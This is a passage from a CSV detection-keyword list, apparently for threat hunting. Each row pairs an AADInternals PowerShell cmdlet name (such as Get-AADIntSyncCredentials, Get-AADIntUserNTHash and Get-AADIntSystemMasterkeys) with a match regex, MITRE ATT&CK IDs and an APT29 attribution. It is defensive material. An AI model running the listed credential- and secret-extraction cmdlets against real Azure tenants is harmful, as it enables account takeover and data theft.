- T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - 
T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntOneDriveFiles*",".{0,1000}Get\-AADIntOneDriveFiles.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntOpenIDConfiguration*",".{0,1000}Get\-AADIntOpenIDConfiguration.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntPortalAccessTokenUsingCBA*",".{0,1000}Get\-AADIntPortalAccessTokenUsingCBA.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntProxyAgents*",".{0,1000}Get\-AADIntProxyAgents.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and 
Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntProxyGroups*",".{0,1000}Get\-AADIntProxyGroups.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntReadAccessTokenForAADGraph*",".{0,1000}Get\-AADIntReadAccessTokenForAADGraph.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntRecentLocations*",".{0,1000}Get\-AADIntRecentLocations.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
"*Get-AADIntRolloutPolicies*",".{0,1000}Get\-AADIntRolloutPolicies.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntRolloutPolicyGroups*",".{0,1000}Get\-AADIntRolloutPolicyGroups.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntSARAUserInfo*",".{0,1000}Get\-AADIntSARAUserInfo.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntSeamlessSSO*",".{0,1000}Get\-AADIntSeamlessSSO.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation 
tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntSelfServicePurchaseProducts*",".{0,1000}Get\-AADIntSelfServicePurchaseProducts.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntServiceLocations*",".{0,1000}Get\-AADIntServiceLocations.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntServicePrincipals*",".{0,1000}Get\-AADIntServicePrincipals.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntSettings*",".{0,1000}Get\-AADIntSettings.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 
- T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntSharedWithUser*",".{0,1000}Get\-AADIntSharedWithUser.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntSkypeToken*",".{0,1000}Get\-AADIntSkypeToken.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntSPOAuthenticationHeader*",".{0,1000}Get\-AADIntSPOAuthenticationHeader.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntSPOIDCRL*",".{0,1000}Get\-AADIntSPOIDCRL.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 
365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntSPOServiceInformation*",".{0,1000}Get\-AADIntSPOServiceInformation.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntSPOSettings*",".{0,1000}Get\-AADIntSPOSettings.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntSPOSiteGroups*",".{0,1000}Get\-AADIntSPOSiteGroups.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
"*Get-AADIntSPOSiteUsers*",".{0,1000}Get\-AADIntSPOSiteUsers.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntSPOUserProperties*",".{0,1000}Get\-AADIntSPOUserProperties.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntSubscriptions*",".{0,1000}Get\-AADIntSubscriptions.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntSyncConfiguration*",".{0,1000}Get\-AADIntSyncConfiguration.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation 
tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntSyncCredentials*",".{0,1000}Get\-AADIntSyncCredentials.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntSyncDeviceConfiguration*",".{0,1000}Get\-AADIntSyncDeviceConfiguration.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntSyncEncryptionKey*",".{0,1000}Get\-AADIntSyncEncryptionKey.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntSyncEncryptionKeyInfo*",".{0,1000}Get\-AADIntSyncEncryptionKeyInfo.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 
- T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntSyncFeatures*",".{0,1000}Get\-AADIntSyncFeatures.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntSyncObjects*",".{0,1000}Get\-AADIntSyncObjects.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntSystemMasterkeys*",".{0,1000}Get\-AADIntSystemMasterkeys.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntTeamsAvailability*",".{0,1000}Get\-AADIntTeamsAvailability.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD 
and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntTeamsMessages*",".{0,1000}Get\-AADIntTeamsMessages.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntTenantApplications*",".{0,1000}Get\-AADIntTenantApplications.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntTenantAuthenticationMethods*",".{0,1000}Get\-AADIntTenantAuthenticationMethods.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
"*Get-AADIntTenantAuthPolicy*",".{0,1000}Get\-AADIntTenantAuthPolicy.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntTenantDetails*",".{0,1000}Get\-AADIntTenantDetails.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntTenantDomain*",".{0,1000}Get\-AADIntTenantDomain.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntTenantDomains*",".{0,1000}Get\-AADIntTenantDomains.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation 
tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntTenantGuestAccess*",".{0,1000}Get\-AADIntTenantGuestAccess.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntTenantID*",".{0,1000}Get\-AADIntTenantID.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntTenantOrganisationInformation*",".{0,1000}Get\-AADIntTenantOrganisationInformation.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntTranslation*",".{0,1000}Get\-AADIntTranslation.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - 
T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntUnifiedAuditLogSettings*",".{0,1000}Get\-AADIntUnifiedAuditLogSettings.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntUserConnections*",".{0,1000}Get\-AADIntUserConnections.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntUserDetails*",".{0,1000}Get\-AADIntUserDetails.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntUserMasterkeys*",".{0,1000}Get\-AADIntUserMasterkeys.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and 
Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntUserMFA*",".{0,1000}Get\-AADIntUserMFA.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntUserMFAApps*",".{0,1000}Get\-AADIntUserMFAApps.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntUserNTHash*",".{0,1000}Get\-AADIntUserNTHash.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
